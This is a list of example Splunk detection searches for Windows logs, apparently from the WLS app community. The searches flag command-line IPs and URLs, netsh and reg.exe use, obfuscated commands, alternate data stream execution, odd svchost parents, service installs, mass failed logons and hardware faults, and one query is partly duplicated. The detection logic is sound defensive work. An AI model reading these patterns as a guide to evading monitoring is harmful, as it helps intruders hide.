These are meant as examples only. Customization may be required for your specific environment. Results not guaranteed.
Many of these are built-in to the WLS app for Splunk along with EventID decoding and other useful features.
Bro
Bro PE / WLS MD5 NewHash match
`wlslogs` [search sourcetype=bro_files PE MD5 | dedup md5 | rename md5 as MD5 | fields MD5] NewHash=True| eval CallingProcess=coalesce(Process,CreatorProcessName) | eventstats dc(host) as hostCount by MD5 | dedup MD5 | table hostCount,Zone,Signed,CallingProcess,BaseFileName,CompanyName,InternalName,FileDescription,FileVersion,ProductVersion,MD5 | sort -hostCount
Command line parameters
Command line IPv4
`wlslogs` (EventID=592 OR EventID=4688) CommandLine="*"| rex
field=CommandLine "\s(?<cmd_ip>\d+\.\d+\.\d+\.\d+)\s" | where NOT
isnull(cmd_ip) AND NOT cmd_ip="127.0.0.1" | where cidrmatch("0.0.0.0/0",cmd_ip)`wlslogs` (EventID=592 OR EventID=4688) CommandLine="*"
Command line redirect
`wlslogs` (EventID=592 OR EventID=4688) CommandLine="*>*"
Netsh usage
`wlslogs`EventID="592" OR EventID="4688" "netsh.exe" CommandLine="*netsh*"
Non-browser command line URL
`wlslogs` EventID="592" OR EventID="4688" NOT BaseFileName="firefox.exe" NOT BaseFileName="iexplore.exe" NOT BaseFileName="chrome.exe" CommandLine="*://*"
Registry usage
`wlslogs`EventID="592" OR EventID="4688" "reg.exe" CommandLine="*reg*"
Command Monitor
Obfuscated commands
`wlslogs` WLS_CommandMonitor Command="*^*"
Hardware
Disk errors
`wlslogs` ProviderName="Disk"
Display errors
`wlslogs` ProviderName="Display"
Hardware errors
`wlslogs` ProviderName="Microsoft-Windows-WHEA-Logger" | fillnull ErrorType value=0 | fillnull value="" | stats count by host,EventID,ErrorType
Low server disk space
| multisearch [ | search [ | search (WLS_WMI MonitorName="OperatingSystem") OR WMI_OperatingSystem ProductType>1 hoursago=24 | dedup host | fields host ] WLS_PerfCounter CategoryName="LogicalDisk" CounterName="% Free Space" | rename Value AS PercentFreeSpace ] [ | search [ | search (WLS_WMI MonitorName="OperatingSystem") OR WMI_OperatingSystem ProductType>1 hoursago=24 | dedup host | fields host ] WLS_PerfCounter CategoryName="LogicalDisk" CounterName="Free Megabytes" | rename Value AS FreeSpaceMB ]
| selfjoin host, GroupID, InstanceName
| search FreeSpaceMB=* PercentFreeSpace=* NOT (host="safe" InstanceName="E:")
| dedup host, InstanceName sortby -_time
| eval size=(FreeSpaceMB/(PercentFreeSpace/100))/1024
| eval used=size-(FreeSpaceMB/1024)
| eval avail=FreeSpaceMB/1024
| eval percent_used=100-PercentFreeSpace
| search avail<0.7 OR percent_used>95
| table host, InstanceName, size, used, avail, percent_used| rename host AS "Host", InstanceName AS "Volume", size AS "Size (GB)", used AS "Used (GB)", avail AS "Available (GB)", percent_used AS "Percent Used"
NTFS errors
`wlslogs` ProviderName="Ntfs"
Predicted drive failure
`wlslogs` WLS_WMI MonitorName="FailurePredictStatus" PredictFailure="True" | dedup host,InstanceName sortby -_time
Logon Activity
Multiple failed logons
`wlslogs` EventID="529" OR EventID="530" OR EventID="531" OR EventID="532" OR EventID="533" OR EventID="534" OR EventID="535" OR EventID="536" OR EventID="537" OR EventID="539" OR EventID="4625" | eval auth_package=coalesce(AuthenticationPackage, AuthenticationPackageName)| eval logon_process=coalesce(LogonProcess, LogonProcessName) | eval logon_type=LogonType| eval logon_type_description=LogonTypeDescription| eval src_nt_domain=coalesce(CallerDomain, SubjectDomainName) | eval subject_user_name=coalesce(CallerUserName, SubjectUserName) | eval dest_nt_domain=coalesce(Domain, TargetDomainName) | eval target_user_name=coalesce(UserName, TargetUserName) | eval src_host_short=WorkstationName | eval original_user=target_user_name | fillnull value=0 original_user, dest_nt_domain, auth_package ,FailureReason| stats count dc(host) as hostCount BY original_user, dest_nt_domain, auth_package,FailureReason| search count>50
Misc
Alternate data stream execution
`wlslogs` (EventID=4688 OR EventID=592) AlternateDataStream=True
Failed/failing system clock
`wlslogs` "Possible bad clock"
Microsoft AV Detection
`wlslogs` ((ProviderName="Microsoft Antimalware" sourcetype="wls:System") OR sourcetype="wls:Microsoft-Windows-WindowsDefender/Operational") (EventID="1116" OR EventID="1117") | eval ThreatName=coalesce(ThreatName,Data7) | eval SeverityName=coalesce(SeverityName,Data9) | eval DetectionUser=coalesce(DetectionUser,Data19) | eval Path=coalesce(Path,Data21) | eval OriginName=coalesce(OriginName,Data23) | eval ExecutionName=coalesce(ExecutionName,Data25) | eval ActionName=coalesce(ActionName,Data30) | eval ErrorDescription=coalesce(ErrorDescription,Data33) | eval AdditionalActionsString=coalesce(AdditionalActionsString,Data37) | eval TypeName=coalesce(TypeName,Data27) | eval ProcessName=coalesce(ProcessName,Data18) | table _time,host,DetectionUser,ThreatName,SeverityName,TypeName,ProcessName,OriginName,ExecutionName,ActionName,ErrorDescription,AdditionalActionsString,Path
Processes
Launched by Internet Explorer
LogType=WindowsEventLog (EventID=592 OR EventID=4688)
CreatorProcessName=iexplore NOT BaseFileName="iexplore.exe"| dedup
BaseFileName,CommandLine
Non standard process extension
`wlslogs` EventID=4688 | regex BaseFileName="(?i)[^(exe)|(scr)]$"
Services
Abnormal service start
`wlslogs` EventID=4688 BaseFileName="svchost.exe" NOT CreatorProcessName="services" NOT CreatorProcessName="svchost"
New service install
`wlslogs` EventID="601" OR EventID="4697" OR EventID="7045"
Windows Errors
Application Error
`wlslogs` ProviderName="Application Error"
Application Hang
`wlslogs` ProviderName="Application Hang"
Application Popup
`wlslogs` ProviderName="Application Popup"
BSOD
`wlslogs` host=* EventID=1001 ProviderName="Microsoft-Windows-WER-SystemErrorReporting" Level="2"
digirati82 